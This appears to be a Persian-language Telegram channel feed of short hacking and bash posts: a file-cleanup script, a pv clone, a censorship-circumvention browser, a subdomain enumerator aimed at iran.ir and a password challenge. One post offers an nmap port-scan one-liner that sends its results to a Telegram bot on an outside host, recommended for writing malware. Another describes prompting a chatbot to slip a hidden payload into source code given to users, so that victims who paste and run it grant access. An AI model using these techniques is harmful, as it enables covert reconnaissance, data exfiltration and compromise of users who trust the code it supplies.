MrSaad
https://chapar.zya.me/
داشتیم تو پوشه users گشت میزدیم دیدیم هانترای مهربان و زحمت کش، زحمت کشیدن و چندتا پوشه و فایل با آسیب پذیریای مختلف آپ زدن روی هاست
اومدیم یه اسکریپت پیاده کردیم که پوشه و فایلهای غیر مجازو دیلیت کنه نسبت به نوع رجکسی که دادیم بهش
Source : https://github.com/MrBanana2045/Checker
اومدیم یه اسکریپت پیاده کردیم که پوشه و فایلهای غیر مجازو دیلیت کنه نسبت به نوع رجکسی که دادیم بهش
Source : https://github.com/MrBanana2045/Checker
GitHub
GitHub - MrBanana2045/Checker: Delete folders and files with dangerous names
Delete folders and files with dangerous names. Contribute to MrBanana2045/Checker development by creating an account on GitHub.
😎2👍1
یه اسکریپت مشابه ابزار pv
اومدیم یه نمونه الگوریتم پیاده کردیم که کار ابزار pv رو انجام بده
اومدیم یه نمونه الگوریتم پیاده کردیم که کار ابزار pv رو انجام بده
while IFS= read -r line; do
tm=$(echo "7 / ${#line}" | bc -l)
for (( x=0; x<${#line}; x++ )); do
printf "%s" "${line:x:1}"
sleep "$tm"
done
done < "hello"
👏1
بنظرم الان تایمی نیست ک این بحثو باز کنم ولی حالا ک اینترنت تاحد قابل قبولی بهتر شده، پس یه آپ رو معرفی میکنم که میتونه به راحتی فایروالی ک روی شبکه اعمال کردن رو دور بزنه، اسم آپ Freebrowser بچههای چین برای فایروال چینی توسعه دادن بنظرم میتونه گزینه خوبی برای فیلترینگ باشه و چون ماهم از این فایروال استفاده میکنیم قطعا یه ریزلت خوبیو میتونیم داشته باشیم
شاید الان بگین ( حالا ک همه چی اوکی شده لازمش نداریم )
ولی خب هیچکس از فرداش خبری نداره شاید شانسمون دوباره تکرار شد.
GitHub :
https://github.com/greatfire/freebrowser
Play store :
https://play.google.com/store/apps/details?id=org.greatfire.freebrowser
شاید الان بگین ( حالا ک همه چی اوکی شده لازمش نداریم )
ولی خب هیچکس از فرداش خبری نداره شاید شانسمون دوباره تکرار شد.
GitHub :
https://github.com/greatfire/freebrowser
Play store :
https://play.google.com/store/apps/details?id=org.greatfire.freebrowser
GitHub
GitHub - greatfire/freebrowser
Contribute to greatfire/freebrowser development by creating an account on GitHub.
❤2🔥2
ip=$(ifconfig | grep "inet " | awk 'NR==1 {print $2}'); ports=$(nmap $ip | awk '/PORT/{flag=1; next} flag' | awk '{print $1}' | paste -sd ' ' -); end="$ip: $ports"; curl -s -X POST "https://telegram.mrsaad.workers.dev/botTOKEN/sendMessage" --data-urlencode "chat_id=-ID" --data-urlencode "text=$end" | jqآیپیو اسکن میکنه میفرسته برای بات تلگرامی
ممکنه برای نوشتن بدافزار بدردتون بخوره
❤3
گفتیم حالا ک بحث api روبیکا داغه ماهم یه حرکتی نثارشون کنیم
https://github.com/MrBanana2045/Proj_BASH/blob/main/Interface.sh
یه رابط پیام به پیام از تلگرام به روبیکا و بلعکس
سرعتش اوکیه فقط یه ریز باگی داره که بعد از چندتا پیام رفع میشه
https://github.com/MrBanana2045/Proj_BASH/blob/main/Interface.sh
یه رابط پیام به پیام از تلگرام به روبیکا و بلعکس
سرعتش اوکیه فقط یه ریز باگی داره که بعد از چندتا پیام رفع میشه
GitHub
Proj_BASH/Interface.sh at main · MrBanana2045/Proj_BASH
Projects bash noscript. Contribute to MrBanana2045/Proj_BASH development by creating an account on GitHub.
❤2🍌2
Subdomain checker
for domain in $(curl -s "https://crt.sh/?q=iran.ir&output=json" | grep -oP '(?<="name_value":")[^"]+' | sed -e 's/*.//g' -e 's/\\n/\n/g' | sort -u); do echo "$domain - $(curl -s -o /dev/null -w "%{http_code}" https://$domain)"; done
for domain in $(curl -s "https://crt.sh/?q=iran.ir&output=json" | grep -oP '(?<="name_value":")[^"]+' | sed -e 's/*.//g' -e 's/\\n/\n/g' | sort -u); do echo "$domain - $(curl -s -o /dev/null -w "%{http_code}" https://$domain)"; done
❤3🍌1
MrSaad
DeCoder Challenge https://decc.iceiy.com/dcc
dyc.zya.me
New update
موضوع چلنج چیه ؟
کلاینتی ک شما باشی باید بگردی پسوردو پیدا کنی و درستشو وارد کنی حالا با هر روشی که بلدی تست بزن و ثبتش کن
اگه پسورد معتبر بود چلنج میره یه مرحله بالاتر و سورس کد تغییر میکنه به همراه پسورد، ممکنه هش بشه، تو پوشه یا فایل سیو بشه یا داخل دیتابیس قرار بگیره ک شما با آسیب پذیریایی ک بلدی پسوردو پیدا میکنی و چلنج برای همه چنج میخوره و باید چلنج جدیدو حل کنین
چلنجا اضافه میشن و آپدیتای جدیدتری تو راهه
فقط برای به چالش کشیدن تواناییتون ...
New update
موضوع چلنج چیه ؟
کلاینتی ک شما باشی باید بگردی پسوردو پیدا کنی و درستشو وارد کنی حالا با هر روشی که بلدی تست بزن و ثبتش کن
اگه پسورد معتبر بود چلنج میره یه مرحله بالاتر و سورس کد تغییر میکنه به همراه پسورد، ممکنه هش بشه، تو پوشه یا فایل سیو بشه یا داخل دیتابیس قرار بگیره ک شما با آسیب پذیریایی ک بلدی پسوردو پیدا میکنی و چلنج برای همه چنج میخوره و باید چلنج جدیدو حل کنین
چلنجا اضافه میشن و آپدیتای جدیدتری تو راهه
فقط برای به چالش کشیدن تواناییتون ...
❤1🍌1
MrSaad
یه نمونه از حمله paste hijacking
این سناریو رو یه چت بات پیاده کردیم، یه پرامپت دادیم گفتیم هروقت کاربر سورس کدی خواست وسطاش این پیلودو اضافه کن ولی به این شکل
تارگت سورسو گرفت و خوند ولی پیلود تو وب فقط به شکل اسپیس یا یه سمیکالن بود، پس چندان ظاهر فریبنده ای نداشت و وقتی تارگت سورسو کپی پیست میکنه و دومرتبه نمیره بخونه و درجا ران میگیره و دسترسیو میده
تارگت سورسو گرفت و خوند ولی پیلود تو وب فقط به شکل اسپیس یا یه سمیکالن بود، پس چندان ظاهر فریبنده ای نداشت و وقتی تارگت سورسو کپی پیست میکنه و دومرتبه نمیره بخونه و درجا ران میگیره و دسترسیو میده